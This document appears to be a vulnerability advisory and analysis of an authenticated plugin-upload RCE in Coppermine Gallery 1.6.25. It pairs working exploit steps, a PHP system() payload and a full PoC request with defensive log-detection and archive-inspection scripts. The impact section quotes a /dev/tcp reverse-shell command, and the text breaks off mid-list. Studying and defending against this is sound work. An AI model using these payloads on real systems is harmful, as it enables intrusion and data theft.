Coppermine Gallery 1.6.25 - RCE

Exploit Author: Mirabbas Ağalarov
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2023-10-09
Exploit Title: coppermine-gallery 1.6.25 RCE
Application: coppermine-gallery
Version: v1.6.25  
Bugs:  RCE
Technology: PHP
Vendor URL: https://coppermine-gallery.net/
Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zip
Date found: 05.09.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
Steps


1. First of all, create a PHP file with the content <?php echo system('cat /etc/passwd'); ?> and compress that file into a ZIP archive:
$ cat >> test.php
<?php echo system('cat /etc/passwd'); ?>
$ zip test.zip test.php

2. Log in to an account.
3. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php
4. Upload the ZIP file.
5. Visit the PHP file at http://localhost/cpg1.6.x-1.6.25/plugins/test.php



PoC request

POST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1
Host: localhost
Content-Length: 630
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342c
Connection: close

------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="plugin"; filename="test.zip"
Content-Type: application/zip

PK
�����™b%Wz½µ}(���(�����test.phpUT�ñòödÓòödux���������<?php echo system('cat /etc/passwd');?>
PK
�����™b%Wz½µ}(���(������������¤����test.phpUT�ñòödux���������PK������N���j�����
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="form_token"

50982f2e64a7bfa63dbd912a7fdb4e1e
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="timestamp"

1693905214
------WebKitFormBoundaryi1AopwPnBYPdzorF--


Coppermine Gallery 1.6.25 Remote Code Execution (RCE) Vulnerability: A Deep Dive into Exploitation and Mitigation

The Coppermine Gallery 1.6.25 remote code execution (RCE) vulnerability, discovered on September 5, 2023, by security researcher Mirabbas Ağalarov, represents a critical flaw in a widely used PHP-based photo gallery application. This vulnerability enables attackers to execute arbitrary system commands through the plugin management interface, posing a severe threat to system integrity and data confidentiality.

Understanding the Vulnerability

Coppermine Gallery is a popular open-source web application designed to manage and display photo collections. Version 1.6.25, while stable in functionality, contains a dangerous flaw in its pluginmgr.php file, which handles plugin uploads. The application allows users to upload ZIP files containing PHP scripts, but fails to sanitize or validate the contents properly before extracting and executing them.

Due to improper handling of uploaded archives, the system extracts ZIP files directly into the plugins/ directory without verifying file types or content. This bypasses security checks, enabling an attacker to upload a malicious PHP file disguised as part of a legitimate plugin archive.

Exploitation Steps and Proof of Concept (POC)

Here’s a step-by-step breakdown of how the RCE exploit is executed:

  • Create a malicious PHP file: A simple PHP script that executes system commands, such as cat /etc/passwd, is written.
  • Package it in a ZIP archive: The PHP file is compressed into a ZIP file to mimic a legitimate plugin package.
  • Authenticate to the application: The attacker must have valid credentials to access the plugin management interface.
  • Upload the ZIP file: Using the pluginmgr.php endpoint with the op=upload parameter, the malicious ZIP is uploaded.
  • Execute the payload: Once uploaded, the PHP file is accessible via the web server path /plugins/test.php.

Proof of Concept Request

POST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1
Host: localhost
Content-Length: 630
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342c
Connection: close

------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="plugin"; filename="test.zip"
Content-Type: application/zip

PK
�����™b%Wz½µ}(���(�����test.phpUT�ñòödÓòödux���������
PK
�����™b%Wz½µ}(���(������������¤����test.phpUT�ñòödux���������PK������N���j�����
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="form_token"

50982f2e64a7bfa63dbd912a7fdb4e1e
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="timestamp"

1693905214
------WebKitFormBoundaryi1AopwPnBYPdzorF--

This HTTP request demonstrates the upload process. The key components include:

  • multipart/form-data boundary for handling file upload.
  • Content-Disposition: form-data; name="plugin"; filename="test.zip" — indicating the ZIP file upload.
  • Content-Type: application/zip — correctly identifying the file type.
  • ZIP content — embedded PHP script that executes system('cat /etc/passwd').
  • form_token and timestamp — CSRF protection tokens, required for successful upload.

Upon successful upload, the attacker can navigate to http://localhost/cpg1.6.x-1.6.25/plugins/test.php and observe the output of /etc/passwd, confirming RCE success.
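The sequence described in the advisory's steps and in the breakdown above (a POST to pluginmgr.php?op=upload followed shortly by a GET of a PHP file under plugins/) leaves a clear trace in the web server's access log. The following Python script is an added example by the editor, not part of the advisory or of Coppermine, that runs that detection over a few constructed log lines in combined log format. The 30-minute correlation window and the weaker secondary heuristic (a PHP file requested directly in the plugins/ root, rather than inside a plugin subdirectory) are assumptions of this example.

```python
import re
from datetime import datetime, timedelta

# Apache/nginx "combined" access log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# The upload endpoint shown in the PoC request, and any PHP file below plugins/.
UPLOAD_RE = re.compile(r"/pluginmgr\.php\?(?:.*&)?op=upload(?:&|$)")
PLUGIN_PHP_RE = re.compile(r"/plugins/[^?]*\.php(?:\?|$)")
# Assumption of this example: a PHP file directly in plugins/ (no plugin subdirectory)
# is anomalous on its own, as the advisory's plugins/test.php path illustrates.
PLUGIN_ROOT_PHP_RE = re.compile(r"/plugins/[^/?]+\.php(?:\?|$)")

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [05/Sep/2023:10:33:30 +0000] "GET /cpg1.6.x-1.6.25/pluginmgr.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
10.0.0.5 - - [05/Sep/2023:10:33:34 +0000] "POST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1" 302 0 "http://localhost/cpg1.6.x-1.6.25/pluginmgr.php" "Mozilla/5.0"
10.0.0.5 - - [05/Sep/2023:10:33:41 +0000] "GET /cpg1.6.x-1.6.25/plugins/test.php HTTP/1.1" 200 1543 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Sep/2023:11:02:10 +0000] "GET /cpg1.6.x-1.6.25/plugins/sample/codebase.php HTTP/1.1" 200 12 "-" "curl/8.0"
10.0.0.11 - - [05/Sep/2023:11:05:00 +0000] "GET /cpg1.6.x-1.6.25/plugins/x.php HTTP/1.1" 404 0 "-" "curl/8.0"
10.0.0.7 - - [05/Sep/2023:11:10:00 +0000] "GET /cpg1.6.x-1.6.25/index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def find_plugin_upload_execution(lines, window=timedelta(minutes=30)):
    """Return (signal, ip, path) findings for upload-then-execute and plugins-root PHP hits."""
    last_upload = {}  # client ip -> timestamp of its most recent plugin upload POST
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path = rec["ip"], rec["path"]
        if rec["method"] == "POST" and UPLOAD_RE.search(path):
            last_upload[ip] = rec["ts"]
            continue
        if rec["method"] == "GET" and PLUGIN_PHP_RE.search(path):
            since = last_upload.get(ip)
            # Strong signal: the same client uploaded a plugin archive shortly before.
            if since is not None and timedelta(0) <= rec["ts"] - since <= window:
                findings.append(("upload-then-execute", ip, path))
            # Weaker signal: PHP requested directly in the plugins/ root.
            elif PLUGIN_ROOT_PHP_RE.search(path):
                findings.append(("php-in-plugins-root", ip, path))
    return findings


if __name__ == "__main__":
    for finding in find_plugin_upload_execution(SAMPLE_LOG.splitlines()):
        print(*finding)
```

Run it over a real access log with `find_plugin_upload_execution(open("access.log"))`; the request to plugins/sample/codebase.php in the sample is deliberately not flagged, because a PHP file inside a plugin subdirectory with no preceding upload from that client is what normal installed plugins look like.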

Technical Root Cause

The vulnerability stems from a lack of file validation and execution sandboxing in the plugin upload process. Specifically:

  • ZIP archives are extracted without checking for PHP file extensions.
  • Uploaded files are directly placed in the plugins/ directory, which is accessible via the web server.
  • No filtering or allow-listing of the file types inside the archive (for example, permitting .php files only when explicitly required).
  • PHP execution is not restricted to trusted or approved plugin directories.

This creates an open door for arbitrary code execution, especially when combined with a valid user session.
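The root-cause list above amounts to one missing step: the archive is never inspected before it is extracted into a web-served directory. The following Python function is an added example by the editor, not Coppermine's code, of what such a pre-extraction check looks like. Its policy is an assumption: it reports path traversal, symlinks, .htaccess files, server-side code (by any .php-style name segment, and by sniffing for a PHP open tag under any extension) and oversized archives, so the caller can reject the upload unless that content was explicitly permitted. The two sample archives are constructed in memory; the first mirrors the shape of the advisory's test.zip.

```python
import io
import zipfile

# Policy of this example (an assumption, not Coppermine's own rules).
CODE_EXTENSIONS = {"php", "phtml", "phar", "php3", "php4", "php5", "php7", "phps", "inc"}
PHP_OPEN_TAGS = (b"<?php", b"<?=")
S_IFMT, S_IFLNK = 0o170000, 0o120000  # Unix mode bits stored in ZIP external attributes


def inspect_plugin_archive(data, max_members=500, max_total_bytes=50_000_000):
    """Return a list of (issue, member_name) found in a ZIP, without extracting anything."""
    issues = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        members = zf.infolist()
        if len(members) > max_members:
            issues.append(("too-many-members", ""))
        total = 0
        for info in members:
            name = info.filename
            parts = name.replace("\\", "/").split("/")
            # Absolute paths and '..' components would write outside the plugins/ directory.
            if name.startswith("/") or (len(name) > 1 and name[1] == ":") or ".." in parts:
                issues.append(("path-traversal", name))
            # A symlink extracted into a web root can expose arbitrary files.
            if (info.external_attr >> 16) & S_IFMT == S_IFLNK:
                issues.append(("symlink", name))
            if info.is_dir():
                continue
            total += info.file_size
            leaf = parts[-1].lower()
            # A dropped-in .htaccess can change which files the web server executes.
            if leaf == ".htaccess":
                issues.append(("server-config", name))
            # Check every name segment after the first dot, not only the final suffix:
            # 'shell.php.jpg' is executed by some Apache handler configurations.
            if any(seg in CODE_EXTENSIONS for seg in leaf.split(".")[1:]):
                issues.append(("server-side-code", name))
            # Content sniffing catches code hidden under a harmless-looking extension.
            with zf.open(info) as fh:
                head = fh.read(512)
            if any(tag in head for tag in PHP_OPEN_TAGS):
                issues.append(("php-open-tag", name))
        if total > max_total_bytes:
            issues.append(("archive-too-large", ""))
    return issues


def build_archive(entries):
    """Constructed helper: build a ZIP in memory from (name, content_bytes, is_symlink) tuples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content, is_symlink in entries:
            info = zipfile.ZipInfo(name)
            if is_symlink:
                info.external_attr = (S_IFLNK | 0o777) << 16
            zf.writestr(info, content)
    return buf.getvalue()


# Constructed samples: the advisory's single-file archive, and a benign plugin-style layout.
MALICIOUS_ZIP = build_archive([("test.php", b"<?php echo system('cat /etc/passwd'); ?>", False)])
BENIGN_ZIP = build_archive([("sample/readme.txt", b"hello", False),
                            ("sample/style.css", b"body{}", False)])

if __name__ == "__main__":
    print("malicious:", inspect_plugin_archive(MALICIOUS_ZIP))
    print("benign:", inspect_plugin_archive(BENIGN_ZIP))
```

The upload handler would call inspect_plugin_archive on the raw upload and refuse extraction when the list is non-empty; because the check runs on the archive bytes, it costs nothing on disk and cannot be bypassed by a name that only looks harmless, since the open-tag sniff and the segment check are independent of each other.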

Real-World Impact and Risks

Attackers leveraging this vulnerability can:

  • Read sensitive system files like /etc/passwd, /etc/shadow, or configuration files.
  • Deploy reverse shells via system('bash -i >& /dev/tcp/192.168.1.100/4444 0>&1').
  • Execute commands to escalate privileges, install backdoors, or exfiltrate data.
  • Gain full control over the web server and potentially the underlying host system.

Given that Coppermine Gallery is often deployed in shared hosting environments or on personal servers, this RCE can compromise not only the gallery but also the entire hosting infrastructure.

Security Recommendations and Mitigation

To protect systems running Coppermine Gallery 1.6.25, the following actions are essential:

  • Upgrade immediately: Upgrade to a patched version (e.g., v1.6.26 or later) as provided by the official vendor coppermine-gallery.net.
  • Disable plugin upload functionality: If plugins are not required, disable the pluginmgr.php interface entirely.
  • Implement file type restrictions: Configure the server to only allow specific file types (e.g., .txt, .css) for uploads, and block